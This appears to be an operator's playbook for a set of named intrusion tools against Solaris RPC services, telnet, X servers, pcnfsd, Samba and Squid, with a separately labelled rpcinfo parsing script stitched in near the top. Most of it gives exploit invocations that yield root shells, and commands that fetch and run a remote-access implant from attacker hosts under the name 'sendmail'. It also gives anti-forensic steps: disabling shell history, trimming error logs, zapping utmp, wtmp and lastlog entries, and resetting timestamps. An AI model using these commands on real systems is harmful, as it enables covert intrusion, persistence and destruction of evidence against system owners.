ps -ef | grep dmi
### should see something like this:
#  root   580   399  0 12:48:18 ?  0:00 grep dmi
#  root   577     1  0 12:48:18 ?  0:00 /usr/lib/dmi/snmpXdmid -s target
#  root   573     1  0 12:48:18 ?  0:00 /usr/lib/dmi/dmispd
### Cleanup:
# possible core file in /? or /usr/lib/dmi/dmispd?
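### The `rpcinfo -p` / `rpcinfo -n` lookup above as a small parser: fed `rpcinfo -p` output it
### returns the UDP (or TCP) port and the registered versions for a program number, which is
### the same lookup EASYSTREET (cmsd, 100068), BS (sadmind, 100232) and EBBSHAVE (per-program
### -v and -p) need further down. This is an added example, not the notes' own tooling; the
### function names are the example's own, and the sample `rpcinfo -p` block is constructed
### (only the two 300598 lines are the ones the notes quote; the other ports are made up).

```sh
#!/bin/sh
# Added example (not from the original notes). POSIX sh + awk.

# Constructed stand-in for `rpcinfo -p target` so the example runs offline.
# The 300598 lines are the ones quoted in the notes; the rest is made up.
sample_rpcinfo() {
    cat <<'EOF'
   program vers proto   port  service
    100000    4   tcp    111  rpcbind
    100000    4   udp    111  rpcbind
    100232   10   udp  32773  sadmind
    100068    5   udp  32778  cmsd
    100083    1   tcp  32775  ttdbserverd
    300598    1   udp  32879
    300598    1   tcp  32796
EOF
}

# rpc_port PROG PROTO [VERS]   (rpcinfo -p output on stdin)
# Prints the first matching port; exit 1 if the program is not registered.
# The header line never matches because $1 is the word "program".
rpc_port() {
    awk -v prog="$1" -v proto="$2" -v vers="${3:-}" '
        $1 == prog && $3 == proto && (vers == "" || $2 == vers) {
            print $4; found = 1; exit
        }
        END { exit found ? 0 : 1 }'
}

# rpc_versions PROG PROTO   (rpcinfo -p output on stdin)
# One registered version per line: what ebbshave -v and the "version 1 /
# version 2" option pairs are chosen from.
rpc_versions() {
    awk -v prog="$1" -v proto="$2" '$1 == prog && $3 == proto { print $2 }'
}

# rpc_ready HOST PROG PORT [udp|tcp]
# The confirmation touch the notes use: a null-procedure call to the
# registered port. Returns 0 on "ready and waiting". Needs a real rpcinfo
# and the network, so it is not exercised offline; exit 2 on a bad proto.
rpc_ready() {
    host=$1; prog=$2; port=$3
    case ${4:-udp} in
        udp) flag=-u ;;
        tcp) flag=-t ;;
        *)   return 2 ;;
    esac
    rpcinfo -n "$port" "$flag" "$host" "$prog" 2>&1 | grep -q 'ready and waiting'
}

# Demo on the constructed sample.
sample_rpcinfo | rpc_port 300598 udp        # 32879
sample_rpcinfo | rpc_versions 100000 tcp    # 4
```

Pipe the real `rpcinfo -p TARGET_IP` (or the -scan rpc output, once trimmed to the same columns) into `rpc_port` instead of `sample_rpcinfo`; the UDP port it prints is the -p argument for dw.linux, and a miss (exit 1) means the program is not registered at all, which is a different failure from a registered port that does not answer `rpc_ready`.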
-ls /core /usr/lib/dmi/dmispd
#/var/adm/messages (for failures)
-tail /var/adm/messages

#########################################################
# EMPTYCRISS
#########################################################
### No redirection:
### This will create the output to paste into the telnet window:
### local unscripted window:
./emptycriss TARGET_IP
# or
perl ./emptycriss TARGET_IP
### op window
### paste instructions from 1st window into this one
### Ex.:
#ATTACKER# telnet
#
#ATTACKER# telnet> environ define TTYPROMPT abcdef
#
#ATTACKER# telnet> o victimip
#
#ATTACKER# telnet> root c c c c c c c c c c c c c c
#c c c c c c c c c c c c c c c c c c c c c c c c c c
#c c c c c c c c c c c c c c c c c c c c c c c c\n
##
##id
##uid=0(root) gid=1(other)
##uname -a
### if it fails, try again as /bin
ftshell telnet
### Redirected:
-tunnel l RANDOM TARGET_IP 23
#
# In unscripted window
# ./emptycriss 127.0.0.1
# In scripted op window:
ftshell telnet
### NOTE: be sure to open 127.0.0.1 on the RANDOM redirected port
#Ex:
#o 127.0.0.1 RANDOM
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
cd /tmp
mkdir WORK_DIR
cd /tmp/WORK_DIR
pwd
~~p noserver sendmail
ls -la
chmod 700 sendmail
PATH=. D="-l RAT_PORT" sendmail

##########################################
# EASYSTREET
##########################################
### cmsd 100068
### UDP is best since it's a single packet to exploit
-scan rpc TARGET_IP
# look for 100068 and make note of port
### with -sploit:
#-sploit will ask you which exploit to try.
# Select 'CM' (calendar manager)
# Another window will pop up to run the exploit
# This window will pause to allow you to verify the command it will run.
# The command should look something like this (the ports will vary):
# -u 32778 -i 127.0.0.1 -l 192.168.250.3 -r sendmail -D /tmp/.scsi -n 26120 -c
# Append '-T 2' to the front of the line so that it looks like this:
# -T 2 -u 32778 -i 127.0.0.1 -l 192.168.250.3 -r sendmail -D /tmp/.scsi -n 26120 -c
# Then press return.
# The exploit window will prompt you to set up a listener like this:
# You must establish a NOPEN listener on 192.168.250.3:SOME_RANDOM_PORT
-nrtun RANDOM (as indicated in the -sploit exploit prompt)
#Press enter
#Now the exploit will occur and, after a couple of minutes, it will call back
#to your listener.
#Once the callback occurs, take the following steps:
#In a local window
LOCAL>closetunnel
#Press 'A' to abort the autodone commands
#Delete the files created by your exploit
#There should be one lock file and one callog file
-lt /var/spool/calendar
-rm /var/spool/calendar/THE_TWO_MOST_RECENT_FILES
#Use touch to set the directory timestamp back
-lt /var/spool
-touch /var/spool/SOME_OLDER_DIRECTORY /var/spool/calendar

### Usage:
./cmsex
./cmsex.auto
### get nopen ready
packrat noserver
### no redirection
./cmsex -i TARGET_IP -c 'mkdir /tmp/.scsi; cd /tmp/.scsi && telnet LOCAL_IP NETCAT_PORT | uudecode && uncompress sendmail.Z && PATH=. sendmail' -T (-u RANDOM | -t RANDOM)
### Redirected:
-tunnel u RANDOM TARGET_IP CMSD_PORT r NETCAT_PORT
./cmsex -i 127.0.0.1 -c 'mkdir /tmp/.scsi; cd /tmp/.scsi && telnet PITCH_IP NETCAT_PORT | uudecode && uncompress sendmail.Z && PATH=. sendmail' -T 3 -u RANDOM
### when the upload is done, kill the netcat, then try connecting in
-nstun TARGET_IP
-rm sendmail
### Logging:
-lt /var/adm
-lt /var/spool/calendar

#########################################################
# EBB
#########################################################
### Sol2.10 vulnerable for only program 100230 metamhd using ebbshave.v4
### ./ebbshave.v5 is a wrapper program for the ebbnew_linux exploit for Sparc Solaris RPC services
### Important: ebbnew_linux must be in your PATH
command that is useful: rpcinfo -n -u|-t
usage: ./ebbshave.v5 -o -v -t -p
-o : one of the following options [1-19]:
  1, "5.9 metamhd",     program # = 100230,
  2, "5.8 ruserd",      program # = 100002, NOTE = version 1
  3, "5.8 ruserd",      program # = 100002, NOTE = version 2 - must start service first by using rpcinfo -n before using this option
  4, "5.8 ttdbserverd", program # = 100083,
  5, "5.8 cachefsd",    program # = 100235, NOTE = version 1 - Start with option #6 first, if it fails then try this option
  6, "5.8 cachefsd",    program # = 100235, NOTE = version 2 - must start service first by using rpcinfo -n before using this option
  7, "5.8 metad",       program # = 100229, NOTE = version 1
  8, "5.8 metad",       program # = 100229, NOTE = version 2 - must start service first by using rpcinfo -n before using this option
  9, "5.8 metamhd",     program # = 100230,
 10, "5.7 ruserd",      program # = 100002, NOTE = must start service first by using rpcinfo -n before using this option
 11, "5.7 kcms_server", program # = 100221,
 12, "5.7 cachefsd",    program # = 100235,
 13, "5.7 ttdbserverd", program # = 100083,
 14, "5.7 dr_daemon",   program # = 300326,
 15, "5.6 ruserd",      program # = 100002,
 16, "5.6 kcms_server", program # = 100221,
 17, "5.6 cachefsd",    program # = 100235, NOTE = version 1 - Start with option #18 first, if it fails then try this option
 18, "5.6 cachefsd",    program # = 100235, NOTE = version 2 - must start service first by using rpcinfo -n before using this option
 19, "5.6 ttdbserverd", program # = 100083,
-v : the program version number you are exploiting which is obtained from rpcinfo output
-t : target's ip address
-p : port number rpc program is listening on
example: ./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772
If you fail to exploit using ./ebbshave.v5, try bruteforcing using ebbshave.v4

### 1. Use the following command to look for a suitable program to hit
### Redirection:
-tunnel l 111 TARGET_IP
### Local box:
./ebbshave.v5
ebbshave -p 127.0.0.1
### 2. Verify the portnum will work (should respond "ready and waiting")
### Use either:
# rpcinfo -n -u|-t
# Ex.: ebbshave -n 32776 -t targetip 100229
### Redirector:
-tunnel l PORTNUM TARGET_IP
### Locally, see if the program you want is a viable option:
./ebbshave -n portnum -t host prognum
./ebbshave -n PORTNUM -t 127.0.0.1 PROGNUM
### Use this for usage statement
./ebbshave
###### 3. Plug in your choices and go:
### Netcat window:
packrat NETCAT_PORT
### Redirector:
-tunnel l 111 l PORTNUM TARGET_IP r NETCAT_PORT
### Locally:
#ebbshave -B -T OPTION -n PORTNUM -t 127.0.0.1 PROGNUM
ebbshave -n -t 127.0.0.1
# To throw it:
ebbshave -T -n -t 127.0.0.1
### If that doesn't work, try without the best guess (B) option, or maybe increase the
### timeout period (W)
ebbshave -T OPTION -n PORTNUM -t 127.0.0.1 PROGNUM
### If successful, you should get a root shell
### Get the following ready for pasting: (paste one line at a time)
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
cd /tmp
mkdir WORK_DIR
cd /tmp/WORK_DIR
pwd
telnet PITCH_IP NETCAT_PORT < /dev/console | uudecode; ls -la
uncompress sendmail.Z
netstat -an | grep RAT_PORT
D="-l RAT_PORT" PATH=. sendmail
### pitch window
-nstun TARGET_IP RAT_PORT
###### Cleanup:
/usr/openwin/bin/core
/var/adm/messages
Other cores locations?
Always look at utmp, wtmp, etc
####### If you've hit this before and know the addresses:
# Ex.: ./ebbshave -T 1 -S 0xffbefa20 -E 0xffbefa20 -n 32775 -t target 300326
#########################################################
# BS - BLUE
#########################################################
# ../bin/bs.tr -h
#
# Usage:
# [E=ratpreargs] [A=ratpostargs] bs.tr remoteIP remoteHost \
#   [remoteDomain] \
#   sadmindPort remoteDir remoteName localIP localPort
#
# ratpreargs : the string put on remote command line right after PATH=. and
#   before remoteName (e.g. E='C="-c LOCALIP port"' or
#   E='C="-l listenport"')
#
# ratpostargs : the string put on remote command line after running remoteName
#
#
# Command sent to bs will be munged from:
#
#CMD="mkdir -p ${REMOTE_DIR} && cd ${REMOTE_DIR} && telnet ${LOCAL_IP} ${LOCAL_PORT} < /dev/console | uudecode > /dev/null 2>&1 && uncompress -f ${REMOTE_FNAME}.Z && chmod 755 ${REMOTE_FNAME} && PATH=.${RAT_PREARGS} ${REMOTE_FNAME}${RAT_POSTARGS}"
### TRICK - use -A option to get its archtype back
### TRICK - give a bad hostname to see if it's running in secure mode; if it complains, then
### it's still vulnerable, and work out the other options; if there's no response
### try another bad name; if still no response, then it's running in secure mode and
### not vulnerable
### Scan target
#rpcinfo -p TARGET_IP
#
#rpcinfo -n BSPORT -u TARGET_IP 100232
#rpcinfo -n BSPORT -t TARGET_IP 100232
-scan rpc TARGET_IP
mx
:%s/SADMIND_PORT/SADMIND_PORT/g
:%s/REMOTE_DIR/\/tmp\/WORK_DIR/g
`x
###### Start netcat
packrat NETCAT_PORT
############# BS w/ NO REDIRECTION ###########
###### 1. No redirection:
### To use default port
# ./bs.tr TARGET-IP TARGET-NAME SADMIN-PORT REMOTE-DIR RAT-NAME LOCAL-IP NETCAT-PORT
# ./bs.tr TARGET_IP TARGET_NAME SADMIN_PORT REMOTE_DIR RAT_NAME LOCAL_IP NETCAT_PORT
### Try in this order:
bs.auto -i IP -u SADMIND_PORT TARGET_IP
bs.tr_TRY_SECOND remoteIP remoteHost [remoteDomain] sadmindPort remoteDir remoteName localIP localPort
bs.tn.gr_USE_WHEN_bs.auto_AND_bs.tr_FAIL
### To give a port:
#E='D="-l RAT-PORT"' ./bs.tr TARGET-IP TARGET-NAME TARGET-DOMAIN SADMIND-PORT REMOTE-DIR RAT-NAME LOCAL-IP NETCAT-PORT
#E='D="-l RAT_PORT"' ./bs.tr TARGET_IP TARGET_NAME TARGET_DOMAIN SADMIND_PORT REMOTE_DIR RAT_NAME LOCAL_IP NETCAT_PORT
###### 3. Waiting:
# you will see bursty traffic on your tcpdump, first the trigger, then the connection to upload nopen.
# Hit Ctrl-C on your nc
###### 4. Connect to target:
### Direct connect:
cd ../down
noclient TARGET_IP:RAT_PORT
# or
### Callback - have this ready and waiting when running attack:
cd ../down
noclient -l RAT_PORT
############# BS w/ REDIRECTION ###########
###### 1. on redirector
-tunnel
u SADMIND_PORT TARGET_IP
r NETCAT_PORT
s
# and this if nopen needs to run in callback mode:
r RAT_PORT
###### 2. Local window
### Syntax (domainname is not always necessary):
CommandLine: ../bin/bs.tn.gr -h
New usage: ./bs.tn.gr [options] -- [options to ]
-i (required)
-h (required)
-a (does not work) Use alt rpcbind port
-s hardwired 111
-r hardwired 111
-d
-p def= query rpcbind
-l (required)
-n (no default)
-f (required)
-D def= /tmp/...
-S def= /tmp/....
-G grinch args deprecated
### Redirection:
### E='D="-l RAT-PORT"' ./bs.tr 127.0.0.1 TARGET-NAME TARGET-DOMAIN SADMIND-PORT REMOTE-DIR RAT-NAME PITCH-IP NETCAT-PORT
### No domainname:
E='D="-l RAT-PORT"' ./bs.tr 127.0.0.1 TARGET_NAME SADMIND_PORT REMOTE_DIR RAT_NAME PITCH_IP NETCAT_PORT
### With domainname:
E='D="-l RAT_PORT"' ./bs.tr 127.0.0.1 TARGET_NAME TARGET_DOMAIN SADMIND_PORT REMOTE_DIR RAT_NAME PITCH_IP NETCAT_PORT
### Callback:
E='D="-c PITCH_IP RAT_PORT"' ./bs.tr 127.0.0.1 TARGET_NAME SADMIND_PORT REMOTE_DIR RAT_NAME PITCH_IP NETCAT_PORT
###### 3. Waiting:
# you will see bursty traffic on your tcpdump, first the trigger, then the connection to upload nopen.
# Hit Ctrl-C on your nc
###### 4. From redirector:
-nstun TARGET_IP RAT_PORT
# or
-nrtun RAT_PORT
-call PITCH_IP RAT_PORT
###### Cleanup:
# usually nothing
###########################################################
# GS - GREEN
###########################################################
gs.auto
Usage: $PROG -i [ options ]
-i IP    IP of target machine (NO DEFAULT)
-g opt   Change default GS option from ./$GS_OPTION to \"./opt\" (can be grins, frowns or sneer).
-C str   Change default community string from public to \"str\".
-l IP    IP of attack machine (Default: the first active IP found in this order: ppp0, ppp1, eth0 or eth1)
-n #     rat upload port (Default: a random port)
-p #     Use port # for RAT listen/callback. (Default: random)
-s #     Change delay used for -c to # seconds (must appear before -c).
-c       Use NOPEN syntax to have RAT callback after a delay (Default delay: $CALLBACKDELAY seconds). Callback is to -l IP.
-k       Use ksh method instead of telnet/uu*code.
-z       Do NOT use uncompress at either end
-r rat   name of rat on target (Default: sendmail)
-D dir   directory to work from/create on target (Default = /tmp/.scsi)
-P       Assume PATH=. will fail so use ./ratname target, and MUST NOT use uuencode on upload.
-a ARCH  String used to determine which architecture NOPEN server to upload from /current/up/morerats/ using this (note tail -1):
         \"ls -1 ./noserver* 2>/dev/null | grep -i ${ARCH} | tail -1\". If not provided or no match, /current/up/noserver is assumed.
-G       Retry exploit--using already uploaded RAT (useful when you need to try adding -P option or try another RAT callback port).
### Or the old way:
# sneer(2.6) or frowns(2.7+)
gs.os.gr
Usage: /home/black/tmp/20030124-0318/./bin/gs.os.gr [options]
-i (required)
-g def= frowns
-l (required)
-n (required)
-c (no default)
-D def= /tmp/.X11R6
-f def= nscd
-E (no default)
-A (no default)
-S DEPRECATED (and ignored)
-s DEPRECATED (and ignored)
rpcinfo -p TARGET_IP
rpcinfo -n GSPORT -u TARGET_IP 100249
rpcinfo -n GSPORT -t TARGET_IP 100249
# From PI
-scan rpc TARGET_IP
-scan mibiisa TARGET_IP
# should respond w/ snmp version or h/w type if mibiisa is running:
-scan snmp1 TARGET_IP
# should give motd banner to tell you the OS
-scan snmp2 TARGET_IP
# If the above don't answer, GS won't work
#if the scans answer with "No such name" then they are probably not vulnerable
# anything else might be worth a shot as long as you're getting udp 161 to target
### In netcat window:
packrat NETCAT_PORT
# Tunneling
# on redirector
-tunnel
u 161 TARGET_IP
r NETCAT_PORT
s
# logging depends on sneer(2.6) or frowns(2.7+)
# With redirector:
#./gs.os.gr -i 127.0.0.1 -g -l PITCH-IP -n NETCAT-PORT -D /tmp/WORK-DIR -f RAT-NAME
./gs.os.gr -i 127.0.0.1 -g -l PITCH_IP -n NETCAT_PORT -D /tmp/WORK_DIR -f RAT_NAME
# NO tunneling
# Local window
#./gs.os.gr -i TARGET-IP -g -l LOCAL-IP -n NETCAT-PORT -D /tmp/WORK-DIR -f RAT-NAME
./gs.os.gr -i TARGET_IP -g -l LOCAL_IP -n NETCAT_PORT -D /tmp/WORK_DIR -f RAT_NAME
# Both cases:
#you wait 4 minutes, and you should see the upload of nopen
# Ctrl-C your nc
### Connect to target:
### Straight connect (no redirection)
cd ../down
../bin/noclient TARGET_IP
### Connect using redirector:
-nstun TARGET_IP
### Cleanup:
### run cleaner after frowns (or else another callback in 4 minutes) (might be automatic now)
### rm /tmp/mibiisa_ps_data
### toast utmp, wtmp, utmpx, wtmpx
###############################################
# YS - YELLOW
##############################################
### New way:
Usage: ys.auto -i TARGETIP [options]
-i IP    IP of target machine (NO DEFAULT)
-l IP    IP of attack machine (Default: the first active IP found in this order: ppp0, ppp1, eth0 or eth1)
-n #     rat upload port (Default: a random port)
-p #     Use port # for RAT listen/callback. (Default: random)
-s #     Change delay used for -c to # seconds (must appear before -c).
-c       Use NOPEN syntax to have RAT callback after a delay (Default delay: 3 seconds)
-z       Do NOT use uncompress at either end
-e       Do NOT use "2>&1" on target. Fouls up in some shells.
-r rat   name of rat on target (Default: sendmail)
-x #     port to start mini X server on (Default: random port)
-D dir   directory to work from/create on target (Default = /tmp/.scsi)
-P       Assume PATH=. will fail so use ./ratname target, and MUST NOT use uuencode on upload.
-a ARCH  String used to determine which architecture NOPEN server to upload from /current/up/morerats/ using this (note tail -1):
         "ls -1 ./noserver* 2>/dev/null | grep -i ${ARCH} | tail -1". If not provided or no match, /current/up/noserver is assumed.
NOTE: -x # and -p # can be the same, even in callback mode. ys.auto provides a mechanism to allow netcat callback to finish, and its -tunnel to close before the NOPEN server calls back on the same port.
examples:
ys.auto -l 19.16.1.1 -i 10.0.3.1 -n 2222 -r nscd -x 9999 -D /tmp/.dir
ys.auto -i 10.0.3.1
ys.auto -i TARGET_IP -l REDIRECTOR_IP
NOTE: The only REQUIRED ARGUMENT is now -i
The best way to back out of ys.auto once done (whether or not you get on target) is to kill off the packrat window first with ^C then ^D. Then kill off the xc window the same way, finally kill the ys.auto.
ys.auto Version 1.4.1.1
### Old Way:
mx
:%s/XSERVER_PORT/x/g
x
-scan xwin TARGET_IP
### Locally:
packrat NETCAT_PORT
#or
packrat -n /current/bin/nc.YS NETCAT_PORT
######### YS With no redirection:
### Local Window 1:
#./wrap-sun.sh -l LOCAL-IP -r sendmail -p NETCAT-PORT -x XSERVER-PORT -d /tmp/WORK-DIR
./wrap-sun.sh -l LOCAL_IP -r sendmail -p NETCAT_PORT -x XSERVER_PORT -d /tmp/WORK_DIR
### Local Window 2:
#./xc -x LOCAL-IP -y XSERVER-PORT -s LOCAL-IP TARGET-IP
./xc -x LOCAL_IP -y XSERVER_PORT -s LOCAL_IP TARGET_IP
###### YS With REDIRECTION:
###### 1. On redirector - set up nopen tunnel
-tunnel
u 177 TARGET_IP
r XSERVER_PORT
r NETCAT_PORT
s
###### 2. Local window1
#./wrap-sun.sh -l 555.41.145.11 -r sendmail -p 24389 -x 39942 -d /tmp/.scsi
#./wrap-sun.sh -l PITCH-IP -r sendmail -p NETCAT-PORT -x XSERVER-PORT -d /tmp/WORK-DIR
./wrap-sun.sh -l PITCH_IP -r sendmail -p NETCAT_PORT -x XSERVER_PORT -d /tmp/WORK_DIR
# hit return
# type y and hit return
###### 3. Local Window2:
# for redirection local ip is redirector ip
#./xc -x PITCH-IP -y XSERVER-PORT -s PITCH-IP 127.0.0.1
#./xc -x 555.41.145.11 -y 39942 -s 555.41.145.11 127.0.0.1
./xc -x PITCH_IP -y XSERVER_PORT -s PITCH_IP 127.0.0.1
# hit return
# hit return
# hit return
# (At this point you should see a continue.... in your attack1 window)
# in the attack1 window
# hit return
# hit return
# hit return
# (you should see your upload happen...)
### IF Exploit is successful
# DOING THE FOLLOWING WILL GREATLY REDUCE POSSIBLE LOGGING.
# ONLY HIT CONTINUE, IN THE MINI X SERVER WINDOW, ENOUGH
# TIMES TO GET THE RAT UPLOADED.
# WATCH TCPDUMP OUTPUT TO DETERMINE WHEN RAT IS UPLOADED.
# ONCE THE RAT IS UPLOADED, CONNECT
# TO THE TARGET VIA THE RAT AND DO THE FOLLOWING:
ps -ef | grep dtlogin
kill PID
# IF YOU SELECTED THE CORRECT dtlogin PID, THEN YOU SHOULD SEE A
# "connection closed" MESSAGE IN YOUR MINI X SERVER WINDOW. IF
# NOT, YOU SELECTED THE WRONG PID AND JUST KILLED SOMEBODY ELSE'S
# dtlogin. IF ALL GOES WELL, HIT control ^C IN THE MINI X SERVER
# WINDOW AND THE XC WINDOW.
# Ctrl-C your nc window
# Ctrl-C your xc window
###### Double window way:
### Local scripted (you'll type commands in this):
nc -l -p RPORT1
### Local scripted (your output from above will appear here):
nc -l -p RPORT2
### or instead, use doublet in a scripted window (type and output all in same window):
doublet -O -t -i PITCH_IP RPORT1
### then set up the tunnels as below, and use wrap-telnet.sh and xc
### Scripted #1
wrap-telnet.sh -l REDIRECTIP -p RPORT1 -s RPORT2 -x XPORT
### Scripted #2
# xc -x REDIRECTIP -y XPORT -s REDIRECTIP 127.0.0.1
### Redir
# -tunnel
# u 177 TARGET_IP
# r XPORT
# r RPORT1
# r RPORT2
# r NETCAT_PORT
#w/o tunneling
cd ../down
../bin/noclient TARGET_IP
#w/ tunneling. In redirector window
-nstun TARGET_IP
-rm RAT_NAME
###### Cleaning up ######
### The error log file is configurable and so you must examine
### their xdm-config file to find out where errors are being
### logged.
###
### HAVE TO LOOK THROUGH "find" file from getscript
egrep -i '(xdm-config|errors|xerror)' /current/*find*m
### if no find available one of these will probably find it
-ls /tmp/*errors /var/dt/*errors
-cat error_file
-grep PITCH_IP /var/adm/SYSLOG /var/log/syslog /var/adm/messages
-ls -t /var/dt/
### you will notice Xerrors is the most recent
-tail /var/dt/Xerrors
### if your entries are the only ones there....
cat /dev/null >/var/dt/Xerrors
### if there are other entries you will do something like
wc -l /var/dt/Xerrors
### subtract the number of lines that are because of you from above
head -(what's left) > t ; cat t
### if it looks good:
cat t > /var/dt/Xerrors
-cat /var/dt/Xerrors
-rm t
-ls -t /var/adm
### anything that has a reasonably current timestamp you should check
### toasting the login entries.....
### Target window
-put ../up/toast t
### TO VIEW...
./t -u /var/adm/utmp
./t -u /var/adm/wtmp | tail -20
./t -x /var/adm/utmpx
./t -x /var/adm/wtmpx | tail -20
./t -l /var/adm/lastlog | tail
### TO ZAP...
./t -u /var/adm/utmp tty date
./t -u /var/adm/wtmp tty date
./t -x /var/adm/utmpx tty date
./t -x /var/adm/wtmpx tty date
./t -l /var/adm/lastlog /var/adm/wtmpx user
################################################
# CATFLAP
################################################
### on redirector
-stun TARGET_IP 23
# or
-tunnel
l 2323 TARGET_IP 23
r NETCAT_PORT
### Local window
# run catflap to generate output for pasting into telnet:
# syntax: /current/bin/catflap_sparc -h
# Ex:
#/current/bin/catflap_sparc -7 -c "/bin/sh"
/current/bin/catflap_sparc - -c "/bin/sh"
### on redirector
-rtun NETCAT_PORT
### Local window
ftshell telnet localhost 2323
### paste catflap output once you get telnet prompt
### should get root prompt
### Now upload rat
### with ftshell:
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
cd /tmp
mkdir WORK_DIR
cd /tmp/WORK_DIR
pwd
~~p noserver sendmail
ls -la
chmod 700 sendmail
PATH=. D="-l RAT_PORT" sendmail
### now root on target (do the following if you did NOT use ftshell)
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
cd /tmp
mkdir WORK_DIR
cd /tmp/WORK_DIR
pwd
telnet PITCH_IP NETCAT_PORT < /dev/console | uudecode;ls -la
uncompress sendmail.Z
netstat -an | grep RAT_PORT
D="-l RAT_PORT" PATH=. sendmail
### pitch window
-nstun TARGET_IP RAT_PORT
### or in root target window/nc once
### you have nopen on target
-put /current/up/toast t
-ls -t /var/adm /var/log
### look at entries
./t -u /var/adm/utmp
./t -u /var/adm/wtmp | tail -20
./t -x /var/adm/utmpx
./t -x /var/adm/wtmpx | tail -20
############################################
# EXPOSITTRAG
############################################
# exploit pcnfsd version 2.x (fails on v.1 or 3+)
#
# whatever redirector you use, port 514 cannot
# be in use
netstat -an | grep 514
# to determine the version
-scan rpc TARGET_IP
-tunnel u UDP_PCNFSD_PORT TARGET_IP
# LOCAL
#./prout -w TARGET_IP UDP_PCNFSD_PORT
./prout -w 127.0.0.1 791
# pcnfsd version 1, version 3 and higher are not vulnerable
packrat PACKRAT_PORT
-tunnel
r PACKRAT_PORT
u PCNFSDPORT TARGET_IP
# An example of nopen.t: (note the size of this file is 482. If you make
# modifications, change the size appropriately)
# use nopen.t file from build, if not
# can be made with hexedit
C0755 482 t
#!/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/usr/local/etc:/usr/sbin:/usr/bin:/opt/SUNWspro/bin:/etc:/usr/ccs/bin:/usr/lib/nis:/usr/sbin:/usr/bin
export PATH
mkdir /tmp/.scsi
cd /tmp/.scsi
telnet PITCH_IP PACKRAT_PORT < /dev/console |uudecode
uncompress -f sendmail.Z
chmod +x sendmail
#PATH=. D=-cPITCH_IP:NOPEN_PORT sendmail
PATH=. sendmail
/etc/init.d/pcnfs stop
/etc/init.d/pcnfs start
nc -vv -l -p 514 < nopen.t
# edit nopen.t, note the size, subtract 14 from the actual size and replace 482 with the new size
-rtun 514 127.0.0.1
#./slugger2 TARGET_IP TARGET_PORT CMD [PRINTER_NAME]
./slugger2 TARGET_IP TARGET_PORT "cd ..
cd ..
cd ..
cd ..
cd tmp
rcp -p PITCH_IP:t .t
sh .t
"
# CLEANUP
/bin/rm /tmp/.t
# also might be /tmp/-p
/bin/rm -rf /tmp/.scsi
# /var/adm/messages will have pcnfs errors
# check history files
###################### ECHOWRECKER #####################
# samba server vulnerability
# Samba 3.0.2a-9AX and Samba 3.0.5 are currently vulnerable
# Samba 2.x on Redhat 7.3, 8.0, and 9.0 are vulnerable
-scan win_scan TARGET_IP
-tunnel
l 139 TARGET_IP
r RATPORT
./echowrecker_quiet -O -h -c [-s ] [-e ] [-a ] [-b] [-l] [-d ] [-i ]
General cases:
 0 - Samba 3.0.2a-9AX [uses info leak]
 1 - Samba 3.0.5 [uses info leak]
 2 - Samba 2.2.7a (rh9 default) [uses info leak] (DO NOT USE)
Specific cases:
 3 - Redflag 4.0 (kernel 2.4.20 samba 3.0.2a-9AX) (after restart of smb service)
 4 - RedFlag 4.0 (kernel 2.4.20 samba 3.0.2a-9AX) (after reboot of server)
 5 - RedFlag 4.0 AS SE (kernel 2.4.20 samba 2.2.8) (after restart of smb service)
 6 - RedFlag 4.0 AS SE (kernel 2.4.20 samba 2.2.8) (after reboot of server)
 7 - RedHat 7.3 (kernel 2.4.18-3 samba 2.2.3a)
 8 - RedHat 8.0 (kernel 2.4.18-14 samba 2.2.5)
 9 - RedHat 9.0 (samba 2.2.7)
10 - SuSE 9.0 (kernel 2.4.21 samba 2.2.8a)
-b = turn bruteforcing on
-l = just do info leak and print returned bytes - good for fingerprinting
-d = seconds of delay between brute force attempts
-s = start of address range to brute force for the location of the shellcode
-e = end of address range to brute force for the location of the shellcode
-a = address in GOT of function pointer to overwrite (usually 'free') [exactly, not the addr-0xc]
     to find it -> # objdump -R /usr/sbin/smbd | grep free
-s, -e, -i, -a should be input in hex (ie 0x1000)
-c = command to run on server as euid root
Ex: -c "/usr/bin/wget -O /tmp/a http://555.1.2.21/noserver && chmod 755 /tmp/a && /tmp/a"
=========================================================
Also, if the use of the "quiet" echowrecker edition is desired, usage is such:
$ make quiet
$ ./echowrecker_quiet -O 0 -h 127.0.0.1 -c "/usr/bin/wget -O /tmp/a http://PITCH_IP:RATPORT/crond && chmod 755 /tmp/crond && /tmp/crond"
.
Found [20] to try
Trying [1 of 100]
Trying [2 of 100]
etc...
###################### ELECTRICSLIDE #####################
# Heap Overflow in squid 2.5.STABLE1-2 redhat 9.0
-scan 3128 TARGET_IP
-tunnel l 3128 TARGET_IP
-tunnel 9999 udp
./electricslide.pl -t -o -d -l [-U ] [-P ] [-n ] [-f ] [-a ]
-h, --help           Print this helpful message
-t, --target         Target Squid server ip
-o, --target-type    Target type (see list below)
-l, --listen         Electricslide listen port which Squid will connect to
-U, --proxy-user     Proxy-Auth user name (if required)
-P, --proxy-pass     Proxy-Auth password (if required)
-n, --nopen          Set to port of UDP nopen tunnel
-f, --nopen_forward  The address and port of the target machine to forward the attack to through the nopen tunnel
-a, --local-addr     The local ip address (not 127.0.0.1)
-d, --delay          Web server exploit transmit delay (The web server will delay the last 400 bytes of the payload this number of seconds. This ensures that the shellcode will be in proper alignment when the exploit occurs. Default 30)
Examples:
# - Shooter with receiver on port 80:
#./electricslide.pl -t TARGET_IP:3128 -l LOCAL_IP:80 -d 30 -o 0
#
# - Shooter with receivers on port 80 using proxy auth:
#./electricslide.pl -t TARGET_IP:3128 -l LOCAL_IP:80 -d 30 -o 0 -U "user" -P "password"
./electricslide.pl -t 127.0.0.1:7777 -l PITCH_IP:8888 -o 0 -n 9999 -f TARGET_IP:3128
nc 127.0.0.1 9999
# or
eslide [options] <-t profile> <-l listenerip>
--------------------------------------------------------------------------
Options:
-A   Proxy authentication info in username:password format
-l   The ip address for the connect-back proxy request.
-p   The target port. Default: 3128
-P   The connectback port. Must be allowed by proxy. Default: 80
-t   The profile number. See supported profiles below
-k   Disable the firing of the killer profile which gets a fresh heap (at your own risk!)
Profiles:
[0] Gentle Persuasion
[1] Redhat 9
./electricslide -t 1 -l LOCAL_IPorPITCH_IP TARGET_IPor127.0.0.1
###################### ELMIRASIGNET #####################
# vulnerability in awstats software < 6.3 on apache server
